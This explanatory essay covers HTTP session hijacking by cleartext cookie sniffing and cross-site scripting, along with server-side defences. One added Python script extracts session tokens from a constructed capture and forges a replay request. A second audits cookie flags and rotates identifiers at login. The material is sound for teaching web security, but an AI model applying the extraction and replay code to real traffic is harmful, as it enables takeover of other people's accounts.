Session hijacking is an attack in which the attacker takes over an established session between a client and a server, most commonly an HTTP session that the server recognises by a cookie or session token. The simplest form relies on a packet sniffer, a tool that observes and captures packets on a network segment the attacker can see. Wherever the site sends the session identifier in cleartext (plain HTTP rather than HTTPS), the sniffer can read it, and the moment of session initialisation, when the server issues the identifier after the client has authenticated, is the most valuable point to capture because the new identifier and often the credentials themselves pass by unprotected. Having obtained the identifier, the attacker presents it to the web server in his own requests. The server has no way to tell the attacker from the legitimate client, so it grants the attacker the full access of the hijacked session: he can read everything the client can read and make changes in the client's name, while the real client usually notices nothing.
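The following is an added illustration, not code from the original essay, of what the sniffing route yields. It works on a constructed capture of cleartext HTTP messages (the hosts shop.example.test and mail.example.test, the paths, cookie names and token values are all invented), pulls out every cookie that looks like a session identifier, including the one the server issues in its Set-Cookie response at session initialisation, and builds the replay request an attacker would send to impersonate the client. The cookie-name heuristic in SESSION_COOKIE_RE is an assumption of the example.

```python
import re

# Constructed sample of the cleartext HTTP traffic a packet sniffer on the same
# network segment would see when a site runs its login and session over plain
# HTTP rather than HTTPS. Hosts, paths, cookie names and values are invented for
# this example; nothing here was captured from a real network.
CAPTURED = [
    ("client->server",
     "POST /login HTTP/1.1\r\nHost: shop.example.test\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 25\r\n\r\n"
     "user=alice&pass=hunter2xx"),
    ("server->client",
     "HTTP/1.1 302 Found\r\nLocation: /account\r\n"
     "Set-Cookie: PHPSESSID=8d4c21e7b09f; Path=/\r\n\r\n"),
    ("client->server",
     "GET /account HTTP/1.1\r\nHost: shop.example.test\r\n"
     "Cookie: lang=en; PHPSESSID=8d4c21e7b09f\r\n\r\n"),
    ("client->server",
     "GET /inbox HTTP/1.1\r\nHost: mail.example.test\r\n"
     "Cookie: theme=dark; SESSIONID=3b0a9d2f4e7c1a5b\r\n\r\n"),
]

# Heuristic for cookie names that carry a session identifier. This is an
# assumption of the example; real frameworks use many names, so extend as needed.
SESSION_COOKIE_RE = re.compile(r"sess|sid|token|auth", re.IGNORECASE)


def split_message(raw):
    """Split a raw HTTP message into (start line, header dict, body).

    Header names are lower-cased; each maps to a list because a header such as
    Set-Cookie may legitimately appear more than once.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def cookie_pairs(cookie_header):
    """Parse a client Cookie header ('a=1; b=2') into name -> value."""
    pairs = {}
    for part in cookie_header.split(";"):
        name, eq, value = part.strip().partition("=")
        if eq:
            pairs[name] = value
    return pairs


def extract_session_tokens(capture):
    """Walk the capture and collect every session-looking cookie with its host.

    The host of a server response is taken from the preceding client request,
    which is how a sniffer correlates the two halves of the exchange.
    """
    found = []
    current_host = None
    for direction, raw in capture:
        _, headers, _ = split_message(raw)
        if direction == "client->server":
            current_host = headers.get("host", [None])[0]
            for header in headers.get("cookie", []):
                for name, value in cookie_pairs(header).items():
                    if SESSION_COOKIE_RE.search(name):
                        found.append({"host": current_host, "cookie": name,
                                      "value": value, "seen_in": "Cookie"})
        else:
            for header in headers.get("set-cookie", []):
                # Only the first pair of a Set-Cookie is the cookie itself;
                # everything after the first ';' is an attribute such as Path.
                name, _, value = header.split(";", 1)[0].partition("=")
                if SESSION_COOKIE_RE.search(name):
                    found.append({"host": current_host, "cookie": name,
                                  "value": value, "seen_in": "Set-Cookie"})
    return found


def unique_sessions(tokens):
    """Collapse repeated sightings into one (host, cookie name) -> value entry."""
    return {(t["host"], t["cookie"]): t["value"] for t in tokens}


def build_replay_request(token, path):
    """Forge the request an attacker would send to ride the stolen session."""
    return (f"GET {path} HTTP/1.1\r\nHost: {token['host']}\r\n"
            f"Cookie: {token['cookie']}={token['value']}\r\n\r\n")


if __name__ == "__main__":
    tokens = extract_session_tokens(CAPTURED)
    for (host, name), value in unique_sessions(tokens).items():
        print(f"{host}: {name}={value}")
    print(build_replay_request(tokens[-1], "/inbox"))
```

Note that nothing in the script touches the network: it models the analysis step that follows a capture, and the same logic applied to a real pcap would only succeed against a site that still sends its session cookie without TLS.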
There is a second route to session hijacking that needs no access to the network at all and is invisible to the client: cross-site scripting (XSS). This is an application-layer attack rather than a TCP attack. The attacker injects malicious script into a page that the victim's browser renders, so the script runs on the client side with the privileges of the legitimate site.
Such a script can steal the session token or cookie belonging to the legitimate client, typically by reading it through the browser (for instance via document.cookie when the cookie is not marked HttpOnly) and transmitting it to a server the attacker controls, so that the attacker can present it to the web server exactly as in the sniffing case. Alternatively the script can act inside the session directly, issuing requests in the victim's name without the token ever leaving the browser.
Session hijacking can be countered on both the client side and the server side. On the client, the blunt remedy is to disable scripting in the browser, which closes the cross-site scripting route but costs the user every feature of the site that depends on script. On the server, the stronger remedy is tighter control over how the session cookie is issued and handled, especially around authentication: serving the whole site over HTTPS so the identifier is never sent in cleartext, marking the session cookie Secure and HttpOnly so that it is neither transmitted over plain HTTP nor readable by injected script, restricting it with SameSite so it does not ride along on cross-site requests, and issuing a fresh session identifier at the moment the client authenticates so that an identifier captured or planted before login grants nothing afterwards.
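As an added example that is not part of the original essay, the script below shows the server-side controls in working form: an audit of a Set-Cookie header that reports which protections are missing, a weak header beside its hardened form, and a minimal session store that rotates the identifier at login so a pre-authentication identifier is worthless to whoever captured it. The cookie names, values and the SessionStore class are invented for the illustration.

```python
import secrets

# Constructed Set-Cookie values: the weak form a site might emit today and the
# form it should emit. The token value is invented for this example.
WEAK_SET_COOKIE = "PHPSESSID=8d4c21e7b09f; Path=/"
HARDENED_SET_COOKIE = "PHPSESSID=8d4c21e7b09f; Path=/; Secure; HttpOnly; SameSite=Lax"


def audit_set_cookie(header_value):
    """Return a list of the protections missing from one Set-Cookie value.

    An empty list means the cookie is protected against the two theft routes
    discussed above (cleartext sniffing and script access) and against being
    attached to cross-site requests.
    """
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for part in parts[1:]:  # parts[0] is the cookie itself; the rest are attributes
        name, _, value = part.partition("=")
        attrs[name.strip().lower()] = value.strip()
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: cookie is sent over plain HTTP and can be sniffed")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: document.cookie exposes it to injected script")
    if attrs.get("samesite", "").lower() not in {"lax", "strict"}:
        findings.append("missing SameSite=Lax/Strict: cookie rides along on cross-site requests")
    return findings


class SessionStore:
    """Hypothetical server-side session table used to show identifier rotation."""

    COOKIE_NAME = "SESSIONID"

    def __init__(self):
        self._sessions = {}

    def new_session(self):
        """Issue an anonymous pre-login session with an unguessable identifier."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, presented_sid, user):
        """Authenticate the client and rotate the identifier.

        The identifier the client presented before login is dropped outright,
        so anyone who sniffed it, or planted it in the victim's browser, holds
        a dead token once the real user has authenticated.
        """
        data = self._sessions.pop(presented_sid, {"user": None})
        data["user"] = user
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = data
        return new_sid

    def user_for(self, sid):
        """Return the authenticated user for an identifier, or None if unknown."""
        return self._sessions.get(sid, {}).get("user")

    def session_cookie_header(self, sid):
        """Set-Cookie value carrying the identifier with every protection set."""
        return f"{self.COOKIE_NAME}={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for label, header in (("weak", WEAK_SET_COOKIE), ("hardened", HARDENED_SET_COOKIE)):
        print(label, audit_set_cookie(header) or "ok")
    store = SessionStore()
    before = store.new_session()
    after = store.login(before, "alice")
    print("old id still valid:", store.user_for(before) is not None)
    print("new id user:", store.user_for(after))
    print(store.session_cookie_header(after))
```

The Secure flag only helps when the site is actually reachable over HTTPS, so it belongs together with a redirect from HTTP and, ideally, an HSTS header; the HttpOnly flag does not stop an injected script from acting inside the session, it only stops the token from being carried off.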